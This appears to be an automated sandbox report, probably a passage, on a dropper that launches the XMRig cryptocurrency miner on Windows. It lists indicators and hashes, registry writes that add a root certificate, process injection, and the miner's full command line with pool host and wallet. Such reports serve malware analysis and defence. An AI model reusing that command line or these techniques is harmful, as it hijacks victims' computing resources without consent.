| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2760 wrote to memory of 3396 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2760 wrote to memory of 3396 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3396-16-0x000001E594A60000-0x000001E594A80000-memory.dmp
memory/3396-17-0x000001E596450000-0x000001E596470000-memory.dmp
memory/3396-18-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-19-0x000001E596470000-0x000001E596490000-memory.dmp
memory/3396-20-0x000001E596490000-0x000001E5964B0000-memory.dmp
memory/3396-21-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-22-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-23-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-25-0x000001E596490000-0x000001E5964B0000-memory.dmp
memory/3396-24-0x000001E596470000-0x000001E596490000-memory.dmp
memory/3396-26-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-27-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-28-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-29-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-30-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-31-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-32-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-33-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-34-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-35-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-36-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-37-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-38-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-39-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-40-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-41-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-42-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-43-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-44-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-45-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-46-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-47-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-48-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-49-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-50-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-51-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-52-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-53-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-54-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-55-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-56-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-57-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-58-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-59-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-60-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-61-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-62-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-63-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-64-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-65-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-66-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-67-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-68-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-69-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-70-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-71-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-72-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-73-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-74-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-75-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-76-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-77-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-78-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-79-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-80-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-81-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-82-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-83-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-84-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:06
Platform
win10v2004-20240226-en
Max time kernel
1794s
Max time network
1820s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2876 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2876 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
